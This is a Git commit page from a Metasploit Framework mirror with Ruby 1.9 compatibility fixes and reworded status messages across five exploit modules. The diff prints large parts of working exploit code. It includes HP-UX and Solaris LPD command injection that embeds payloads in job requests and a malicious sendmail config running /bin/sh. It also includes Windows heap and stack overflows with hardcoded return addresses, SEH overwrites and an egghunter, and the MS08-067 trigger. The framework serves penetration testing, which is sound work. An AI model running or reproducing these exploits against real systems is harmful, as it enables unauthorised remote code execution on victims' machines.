dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

1.9 compatibility fixes for lpd exploits, clarification in the print messages that we are *trying* to exploit something, not absolutely doing so 

git-svn-id: file:///home/svn/framework3/trunk@8916 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2010-03-25 14:52:35 +00:00
parent 6d606a7587
commit 22cb5a6bea
5 changed files with 94 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/exploits/hpux/lpd/cleanup_exec.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
target. This vulnerability was silently patched with the
buffer overflow flaws addressed in HP Security Bulletin
HPSBUX0208-213.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
@ -53,13 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
@ -73,36 +73,37 @@ class Metasploit3 < Msf::Exploit::Remote
# Connect to the LPD service
connect
print_status("Sending our job request with embedded command string...")
# Send the job request with the encoded command
sock.put(
"\x02" + rand_text_alphanumeric(3) + jid +
"`" + payload.encoded + "`\n"
)
res = sock.get_once(1)
if (res[0] != 0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our job request")
return
end
print_status("Sending our fake control file...")
print_status("Sending our fake control file...")
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
res = sock.get_once(1)
if (res[0] != 0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file")
return
end
print_status("Forcing an error and hijacking the cleanup routine...")
begin
sock.put(rand_text_alphanumeric(16384))
disconnect
rescue
end
end
end

53
modules/exploits/solaris/lpd/sendmail_exec.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Solaris LPD Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
up to and including 8.0. This module uses a technique
discovered by Dino Dai Zovi to exploit the flaw without
needing to know the resolved name of the attacking system.
},
'Author' => [ 'hdm', 'ddz' ],
'License' => MSF_LICENSE,
@ -50,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DisclosureDate' => 'Aug 31 2001',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This is the temporary path created in the spool directory
spath = "/var/spool/print"
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
"f"+"dfA"+jid+"config\n"+
"f"+"dfA"+jid+"script\n"
# The mail configuration file
mailcf =
@ -102,10 +102,10 @@ class Metasploit3 < Msf::Exploit::Remote
"\n"+
"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02metasploit:framework\n")
res = sock1.get_once
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("The target did not accept our job request command")
return
end
print_status("Configuring the spool directory...")
if !(
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
@ -123,19 +123,19 @@ class Metasploit3 < Msf::Exploit::Remote
sock1.close
return
end
# Establish the second connection to the server
sock2 = connect(false)
# Request another cascaded job
sock2.put("\x02localhost:metasploit\n")
res = sock2.get_once
if (not res)
print_status("The target did not accept our second job request command")
return
end
print_status("Triggering the vulnerable call to the mail program...")
end
print_status("Attempting to trigger the vulnerable call to the mail program...")
if !(
send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
send_file(sock2, 3, "dfa" + jid + "config", mailcf)
@ -143,36 +143,37 @@ class Metasploit3 < Msf::Exploit::Remote
sock1.close
sock2.close
return
end
end
sock1.close
sock2.close
print_status("Waiting up to 60 seconds for the payload to execute...")
sleep(60)
handler
end
def send_file(s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if !(res and res[0] == ?\0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if !(res and res[0] == ?\0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file data (#{name})")
return
end
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end
end

19
modules/exploits/windows/misc/bakbone_netvault_heap.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
@ -44,8 +44,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
],
'Privileged' => false,
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
connect
hname = "METASPLOIT"
probe =
probe =
"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("Trying target #{target.name}...")
head =
head =
"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
sent = 0
try = 0
15.times {
15.times {
try += 1
connect
sent = sock.put(pattern)
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
sleep(4)
print_status("Triggering memory overwrite by reconnecting...")
print_status("Attempting to trigger memory overwrite by reconnecting...")
begin
10.times { |x|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Waiting for payload to execute...")
handler
disconnect
disconnect
end
def wfs_delay
@ -162,3 +162,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

81
modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',
'Description' => %q{
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
Exploiting this flaw involves two distinct steps - creating the registry key
and then triggering an overwrite based on a read of this key. Once the key is
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'BID', '18325' ],
[ 'MSB', 'MS06-025' ]
[ 'MSB', 'MS06-025' ]
],
'Privileged' => true,
'DefaultOptions' =>
@ -58,22 +58,22 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
],
'DefaultTarget' => 0))
register_options(
[
[
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
], self.class)
], self.class)
end
# Post authentication bugs are rarely useful during automation
def autofilter
false
end
def exploit
connect()
smb_login()
@ -82,46 +82,46 @@ class Metasploit3 < Msf::Exploit::Remote
# Generate the egghunter payload
hunter = generate_egghunter()
egg = hunter[1]
# Pick a "filler" character that we know doesn't get mangled
# by the wide string conversion routines
# by the wide string conversion routines
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
fil = filset[ rand(filset.length) ].chr
# Bind to the actual DCERPC interface
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle}")
dcerpc_bind(handle)
print_status("Bound to #{handle}")
# Add giant blocks of guard data before and after the egg
eggdata =
# Add giant blocks of guard data before and after the egg
eggdata =
fil * 1024 +
egg +
egg +
payload.encoded +
egg +
egg +
payload.encoded +
fil * 1024
# Place the egghunter where ESI happens to point
bof = (fil * 178)
bof[84, hunter[0].length] = hunter[0]
# Overwrite the SEH ptr, even though ESP is smashed
# The handle after the ret must be an invalid address
pat =
(fil * 886) +
NDR.long(target.ret) +
pat =
(fil * 886) +
NDR.long(target.ret) +
(fil * 3) + "\xc0" +
bof
type2 =
type2 =
NDR.string( (fil * 1024) + "\x00" ) +
NDR.string( pat + "\x00" ) +
NDR.string( (fil * 4096) + "\x00" ) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
type1 =
NDR.long(rand(0xffffffff))
type1 =
NDR.long(rand(0xffffffff)) + # OperatorDial
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
NDR.long(rand(0xffffffff)) + # UseLocation
@ -156,24 +156,24 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.long(rand(0xffffffff)) +
NDR.string("\x00" * 514) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
stubdata =
type1 +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
stubdata =
type1 +
NDR.long(rand(0xffffffff)) +
eggdata
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
begin
print_status('Creating the malicious registry key...')
response = dcerpc.call(0xA, stubdata)
print_status('Triggering the base pointer overwrite...')
print_status('Attempting to trigger the base pointer overwrite...')
response = dcerpc.call(0xA, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
@ -182,3 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

2
modules/exploits/windows/smb/ms08_067_netapi.rb
View File

@ -927,7 +927,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.long(0)
begin
print_status("Triggering the vulnerability...")
print_status("Attempting to trigger the vulnerability...")
dcerpc.call(0x1f, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse